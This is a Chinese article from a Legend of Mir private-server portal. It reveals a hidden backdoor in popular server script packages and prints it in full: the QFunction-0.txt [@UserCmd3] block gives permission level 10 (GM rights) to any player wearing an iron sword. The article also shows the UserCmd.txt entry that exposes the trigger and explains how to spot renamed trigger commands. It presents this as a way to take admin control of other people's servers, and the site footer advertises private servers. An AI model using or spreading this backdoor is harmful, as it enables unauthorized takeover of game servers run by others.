用户登录  |  用户注册
首 页文章管理下载频道发布软件整站程序广告合作
当前位置:传奇服务端文章管理网络杂谈

最新1.76天下毁灭版本和我本沉默铁剑权限漏洞

减小字体 增大字体 作者:佚名  来源:本站整理  发布时间:2012-12-01 00:23:05

这个洞洞在1.76天下毁灭版本、我本沉默和一些基于这两个版本的修改版上普遍存在着的这个权限大部分F 已经封了,也有没封的,碰上是你运气好! 比例 20:1说实话F挺多的……每次扫端都能扫出他来,还都过期了,刚又扫到这个端。

重点是蓝字 :如果检测到人物身上佩戴着铁剑,则给予权限10
一般来说如果X:\MirServer\Mir200\Envir\UserCmd.txt这里是这么写的:
{
帮助  1
服务  2

}
那就是说这个F的后门已经无法发挥作用了 因为第三个自定义功能(即是@UserCmd3)被删掉了

而红字处 如果有后门 则一般是"@在线购买"、"@回收"、"@呱呱“或其他命令,功能虽然不一样,但是代码同样存在,可能gm意识到这个问题或许直接删掉它,或者改成"@功能21211221"或者"@asdasd功能987"一类很难被玩家猜到的命令 (如果挖到端的话,就知道命令了)

漏洞脚本:

=====================================================
F:\端\mirserver(241)\MirServer\Mir200\Envir\Market_Def\QFunction-0.txt
{
[@UserCmd3]
#IF
  CHECKITEMW 铁剑
#ACT
CHANGEPERMISSION 10
[@UserCmd1]
#if
#say
你现在访问的是2003年最古老版本!我本沉默精装版.\
如有疑问请访问官方网站.

[@UserCmd2]
#ACT
#CALL [\\1\会员服务.txt] @加入会员
}
----------------------------------------------------------------------
F:\端\mirserver(241)\MirServer\Mir200\Envir\UserCmd.txt
{
帮助  1
服务  2
功能3  3 (or 在线购买;or 回收;or 呱呱)}


 

Tags:

作者:佚名

文章管理评论评论内容只代表网友观点,与本站立场无关!

   评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
【传奇爱好者】www.68kf.com是热血传奇私服发布网站,提供最全面的新开传奇私服游戏开服信息,盛大游戏授权传奇广告发布网,稳定可靠的传奇经典老站,提供最好的经典复古传奇私服,轻变传奇私服,超级变态传奇私服,以及传奇私服合击视频! 沪ICP备09000106号-1